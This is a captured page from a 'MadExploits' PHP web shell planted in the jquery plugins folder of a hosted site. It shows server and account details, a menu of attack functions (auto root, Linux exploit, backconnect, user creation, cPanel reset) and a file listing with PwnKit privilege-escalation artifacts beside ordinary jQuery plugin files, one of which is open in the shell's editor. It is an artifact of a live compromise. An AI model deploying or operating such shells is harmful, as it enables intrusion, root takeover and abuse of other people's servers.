Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
js /
jquery /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ajaxfileupload
[ DIR ]
drwx---r-x
alerts
[ DIR ]
drwx---r-x
autocomplete
[ DIR ]
drwx---r-x
bxslider
[ DIR ]
drwx---r-x
chosen
[ DIR ]
drwx---r-x
cluetip
[ DIR ]
drwx---r-x
fancybox
[ DIR ]
drwx---r-x
footable
[ DIR ]
drwx---r-x
footable-sort
[ DIR ]
drwx---r-x
growl
[ DIR ]
drwx---r-x
imgareaselect
[ DIR ]
drwx---r-x
jgrowl
[ DIR ]
drwx---r-x
jqzoom
[ DIR ]
drwx---r-x
jstree
[ DIR ]
drwx---r-x
select2
[ DIR ]
drwx---r-x
smartWizard
[ DIR ]
drwx---r-x
tabpane
[ DIR ]
drwx---r-x
thickbox
[ DIR ]
drwx---r-x
timepicker
[ DIR ]
drwx---r-x
treeview-categories
[ DIR ]
drwx---r-x
validate
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
index.php
1.29
KB
-rw----r--
jquery.autosize.js
3.1
KB
-rw----r--
jquery.chosen.js
39.49
KB
-rw----r--
jquery.colorpicker.js
17.46
KB
-rw----r--
jquery.cooki-plugin.js
1.66
KB
-rw----r--
jquery.dimensions.js
2.46
KB
-rw----r--
jquery.dragtable.js
16.52
KB
-rw----r--
jquery.easing.js
4.84
KB
-rw----r--
jquery.excanvas.js
18.96
KB
-rw----r--
jquery.fieldselection.js
1.75
KB
-rw----r--
jquery.flip.js
11.5
KB
-rw----r--
jquery.flot.js
36.67
KB
-rw----r--
jquery.highlight.js
1.33
KB
-rw----r--
jquery.hoverIntent.js
1.57
KB
-rw----r--
jquery.idTabs.js
2.1
KB
-rw----r--
jquery.ifxtransfer.js
1.97
KB
-rw----r--
jquery.jqminmax.js
1.91
KB
-rw----r--
jquery.jscroll.js
14.68
KB
-rw----r--
jquery.pngFix.js
2.51
KB
-rw----r--
jquery.scrollTo.js
2.61
KB
-rw----r--
jquery.serialScroll.js
1.97
KB
-rw----r--
jquery.sortable.js
2.8
KB
-rw----r--
jquery.tablednd.js
11.83
KB
-rw----r--
jquery.tablefilter.js
1.87
KB
-rw----r--
jquery.tagify.js
3.75
KB
-rw----r--
jquery.typewatch.js
2.24
KB
-rw----r--
jquery.validate-creditcard.js
3.72
KB
-rw----r--
jquery.validate.js
20.57
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.tagify.js
/* Author: Alicia Liu */ (function ($) { $.widget("ui.tagify", { options: { delimiters: [13, 188], // what user can type to complete a tag in char codes: [enter], [comma] outputDelimiter: ',', // delimiter for tags in original input field cssClass: 'tagify-container', // CSS class to style the tagify div and tags, see stylesheet addTagPrompt: 'add tags' // placeholder text }, _create: function() { var self = this, el = self.element, opts = self.options; this.tags = []; // hide text field and replace with a div that contains it's own input field for entering tags this.tagInput = $("<input type='text'>") .attr( 'placeholder', opts.addTagPrompt ) .keypress( function(e) { var $this = $(this), pressed = e.which; for ( i in opts.delimiters ) { if (pressed == opts.delimiters[i]) { self.add( $this.val() ); e.preventDefault(); return false; } } }) // for some reason, in Safari, backspace is only recognized on keyup .keyup( function(e) { var $this = $(this), pressed = e.which; // if backspace is hit with no input, remove the last tag if (pressed == 8) { // backspace return; } }); this.tagDiv = $("<div></div>") .addClass( opts.cssClass ) .click( function() { $(this).children('input').focus(); }) .append( this.tagInput ) .insertAfter( el.hide() ); // if the field isn't empty, parse the field for tags, and prepopulate existing tags var initVal = $.trim( el.val() ); if ( initVal ) { var initTags = initVal.split( opts.outputDelimiter ); $.each( initTags, function(i, tag) { self.add( tag ); }); } }, _setOption: function( key, value ) { options.key = value; }, // add a tag, public function add: function(text) { var self = this; text = text || self.tagInput.val(); if (text) { var tagIndex = self.tags.length; var removeButton = $("<a href='#'>x</a>") .click( function() { self.remove( tagIndex ); return false; }); var newTag = $("<span></span>") .text( text ) .append( removeButton ); self.tagInput.before( newTag ); self.tags.push( text ); self.tagInput.val(''); } }, // remove a tag by index, public function // if index is blank, remove the last tag remove: function( tagIndex ) { var self = this; if ( tagIndex == null || tagIndex === (self.tags.length - 1) ) { this.tagDiv.children("span").last().remove(); self.tags.pop(); } if ( typeof(tagIndex) == 'number' ) { // otherwise just hide this tag, and we don't mess up the index this.tagDiv.children( "span:eq(" + tagIndex + ")" ).hide(); // we rely on the serialize function to remove null values delete( self.tags[tagIndex] ); } }, // serialize the tags with the given delimiter, and write it back into the tagified field serialize: function() { var self = this; var delim = self.options.outputDelimiter; var tagsStr = self.tags.join( delim ); // our tags might have deleted entries, remove them here var dupes = new RegExp(delim + delim + '+', 'g'); // regex: /,,+/g var ends = new RegExp('^' + delim + '|' + delim + '$', 'g'); // regex: /^,|,$/g var outputStr = tagsStr.replace( dupes, delim ).replace(ends, ''); self.element.val(outputStr); return outputStr; }, inputField: function() { return this.tagInput; }, containerDiv: function() { return this.tagDiv; }, // remove the div, and show original input destroy: function() { $.Widget.prototype.destroy.apply(this); this.tagDiv.remove(); this.element.show(); } }); })(jQuery);
Close